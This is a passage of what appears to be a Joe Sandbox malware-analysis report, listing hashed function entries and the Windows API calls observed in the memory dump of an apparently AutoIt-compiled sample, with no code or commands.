                                                                                                                                                                                                                                                                            • Opcode ID: 53fb12207f0ce64c21cb3b8ccab063e05db3a7b205f9229a430e77d830f3e8db
                                                                                                                                                                                                                                                                            • Instruction ID: 56071f2f6b45150aa46b13b8d7278e4f805826dfed5ce2eb9e122d10c3736aa8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53fb12207f0ce64c21cb3b8ccab063e05db3a7b205f9229a430e77d830f3e8db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0891A171A00619ABDF20CFA5CC48FEEBBB8EF45715F108559F519AB280D7B09A45CFA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C61C1B
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61C43
                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00C61C67
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61C97
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61D1E
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61D83
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61DEF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                            • Opcode ID: cf496dd7f6f8510fdcaa1eec0292637c0c9e13052c1630829cb4c4a8dcf3e4b6
                                                                                                                                                                                                                                                                            • Instruction ID: 5f6032a226f032b085b91c971326982e99a6ea57ef9d51fdb0d34ea05d658f06
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf496dd7f6f8510fdcaa1eec0292637c0c9e13052c1630829cb4c4a8dcf3e4b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B491EE71A00219AFDB219F99C8C4BBEB7B4FF44712F2C4029E911EB2A1D774A941DB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C743C8
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C744D7
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C744E7
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C7467C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6169E: VariantInit.OLEAUT32(00000000), ref: 00C616DE
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6169E: VariantCopy.OLEAUT32(?,?), ref: 00C616E7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6169E: VariantClear.OLEAUT32(?), ref: 00C616F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                            • Opcode ID: c96e7c9495adeb3466c63ad17f233bcdfa292e92ba37877e9d7c1f4ecceed971
                                                                                                                                                                                                                                                                            • Instruction ID: 2cb09b7bb9063508598fc5305e9f47cd6f5636ca6a7f8ae9bdc7f28d4e1b5aaa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96e7c9495adeb3466c63ad17f233bcdfa292e92ba37877e9d7c1f4ecceed971
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20916A74A083059FC704EF24C48096AB7E5FF89714F14896DF89A9B351DB31EE4ADB82
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?,?,00C50C4E), ref: 00C5091B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50936
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50944
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?), ref: 00C50954
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C756AE
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C757B6
                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C7582C
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00C75837
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                            • Opcode ID: 202dc3983f82e35fd064bdb254e32fb6b36d7b9be08f197d0d18c2d60d647adf
                                                                                                                                                                                                                                                                            • Instruction ID: 12ef31e34907126db62b505a72df09496d38f81784e936a6d649abc58d91a10c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 202dc3983f82e35fd064bdb254e32fb6b36d7b9be08f197d0d18c2d60d647adf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50910575D0021DAFDF14DFA4C880EEEB7B8BF08304F108569E919A7291DB709A48CFA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenu.USER32(?), ref: 00C82C1F
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00C82C51
                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C82C79
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C82CAF
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C82CE9
                                                                                                                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00C82CF7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C543AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetCurrentThreadId.KERNEL32 ref: 00C543B4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C52F00), ref: 00C543BB
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C82D7F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5F292: Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                            • Opcode ID: 93a8164c630e0c2e436d28d85f70f43a30ffbc40450301752d26e31c04b86c10
                                                                                                                                                                                                                                                                            • Instruction ID: c3ecc193da96e6ffe5078197e8f576c422818a922a5a4b4f220d1927431db2fd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93a8164c630e0c2e436d28d85f70f43a30ffbc40450301752d26e31c04b86c10
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81719075A00209AFCB14EF64C849ABEBBF1EF48314F108459E826EB351DB34EE41DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00C88992
                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00C8899E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00C88A79
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00C88AAC
                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 00C88AE4
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 00C88B06
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C88B1E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                            • Opcode ID: c90d982bb41854327ae2caee65924f45ecfe6df2f682345ce4799e10cd313245
                                                                                                                                                                                                                                                                            • Instruction ID: 039f304366fdd0c95755e2cff5791f72acbd2ff698a1d2fb881e4e13a9bd9a45
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c90d982bb41854327ae2caee65924f45ecfe6df2f682345ce4799e10cd313245
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E671B074600204AFDF25EF94C884FFA7BB5FF49308F540459E865A76A1CB31AE48EB58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C5B8C0
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5B8D5
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C5B936
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C5B964
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C5B983
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C5B9C4
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C5B9E7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                            • Opcode ID: 28f31f5b4febf2488d27658340aeb77cd60623935d7b3318aa55bb1bb27f1ee9
                                                                                                                                                                                                                                                                            • Instruction ID: f494c1f1e45cd907a829ce332bb7a67658384bffead0087f4fb63aee14986174
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28f31f5b4febf2488d27658340aeb77cd60623935d7b3318aa55bb1bb27f1ee9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 245103A45087D53EFB3246348C56BBABFA95F06305F088489F9E5458D2C3D8AECCE758
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 00C5B6E0
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5B6F5
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C5B756
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C5B782
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C5B79F
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C5B7DE
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C5B7FF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                            • Opcode ID: 13484cb1d34d7ffd3515d8075dd3c2c31e10c9e9a4e78ee53025e3b068ce842b
                                                                                                                                                                                                                                                                            • Instruction ID: 21acf53ef7bdfd953fd2e411591d7069c9e46ec023acfa9817959ccb98628243
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13484cb1d34d7ffd3515d8075dd3c2c31e10c9e9a4e78ee53025e3b068ce842b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 995105A49047D53EFB3283248C15B7ABE985B45345F088489F4E5468C2D394EECCE768
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00C25F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00C257E3
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C2585E
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C25879
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00C2589F
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,00C25F16,00000000,?,?,?,?,?,?,?,?,?,00C25F16,?), ref: 00C258BE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00C25F16,00000000,?,?,?,?,?,?,?,?,?,00C25F16,?), ref: 00C258F7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                            • Opcode ID: 59dd49c58f436742fc09c6cad8ff234600cb4bb7f33757331f2df9a7b26e5a68
                                                                                                                                                                                                                                                                            • Instruction ID: 76140b9dc951b19a2c1d5b78b12db7f8a663ba6bd024d80fca06922c33971784
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59dd49c58f436742fc09c6cad8ff234600cb4bb7f33757331f2df9a7b26e5a68
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B51C371900659DFCB10DFA8E885BEEBBF8EF09310F14411AE952E7291D7709A42CF60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C130BB
                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00C130C3
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C13151
                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00C1317C
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C131D1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                            • Opcode ID: a4e6116b7a40e8c3692a667e6095dde0de10a3f3b365dcc8b1b03a12f3c1665c
                                                                                                                                                                                                                                                                            • Instruction ID: ff18bf5f8f0deb884d36e21d9ee0f01c8be25a0c95d3d1b9614ca12feffc4bed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4e6116b7a40e8c3692a667e6095dde0de10a3f3b365dcc8b1b03a12f3c1665c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9641DB34E00249EBCF10DF58C845BDE7BB5AF46328F248155E815AB392D731DB85EB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C73AD7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: _wcslen.LIBCMT ref: 00C73AF8
                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C71B6F
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C71B7E
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C71C26
                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C71C56
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                            • Opcode ID: f86b06bb45113890d5c7aed5063c46affc066fbf2541116748eb440582d09e63
                                                                                                                                                                                                                                                                            • Instruction ID: 2b703c61bb494d2a4748a0ac9938095e9c6fa2a5f65afbb4bcb75f15c9124c31
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f86b06bb45113890d5c7aed5063c46affc066fbf2541116748eb440582d09e63
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3141C271600108AFDB109F68C885BB9BBE9EF45324F18C059ED1A9B2D2D770EE45CBE1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5D7CD,?), ref: 00C5E714
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5D7CD,?), ref: 00C5E72D
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C5D7F0
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C5D82A
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5D8B0
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5D8C6
                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00C5D90C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
